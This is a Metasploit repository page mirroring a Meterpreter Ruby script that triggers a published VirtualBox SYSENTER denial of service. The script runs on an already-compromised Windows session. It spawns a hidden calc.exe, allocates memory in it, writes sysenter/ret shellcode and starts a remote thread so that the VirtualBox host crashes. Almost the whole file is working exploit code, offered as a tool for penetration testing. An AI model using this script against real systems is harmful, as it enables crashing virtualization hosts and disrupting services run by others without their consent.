Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

virtualbox_sysenter_dos.rb 1.4KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Meterpreter script for triggering the VirtualBox DoS published at:
  7. # http://milw0rm.com/exploits/9323
  8. opts = Rex::Parser::Arguments.new(
  9. "-h" => [ false,"Help menu." ]
  10. )
  11. opts.parse(args) { |opt, idx, val|
  12. case opt
  13. when "-h"
  14. print_line("virtualbox_sysenter_dos -- trigger the VirtualBox DoS published at http://milw0rm.com/exploits/9323")
  15. print_line("USAGE: run virtualbox_sysenter_dos")
  16. print_status(opts.usage)
  17. raise Rex::Script::Completed
  18. end
  19. }
  20. #check for proper Meterpreter Platform
  21. def unsupported
  22. print_error("This version of Meterpreter is not supported with this Script!")
  23. raise Rex::Script::Completed
  24. end
  25. unsupported if client.platform != 'windows'
  26. # Spawn calculator
  27. pid = client.sys.process.execute("calc.exe", nil, {'Hidden' => 'true'}).pid
  28. print_status("Calculator PID is #{pid}")
  29. calc = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
  30. # Allocate some memory
  31. mem = calc.memory.allocate(32)
  32. print_status("Allocated memory at address #{"0x%.8x" % mem}")
  33. # Write the trigger shellcode
  34. # sysenter
  35. # ret
  36. calc.memory.write(mem, "\x0f\x34\xc3")
  37. print_status("VirtualBox SYSENTER Denial of Service launching...")
  38. # Create a new thread on the shellcode pointer
  39. calc.thread.create(mem, 0)
  40. print_status("VirtualBox SYSENTER Denial of Service delivered.")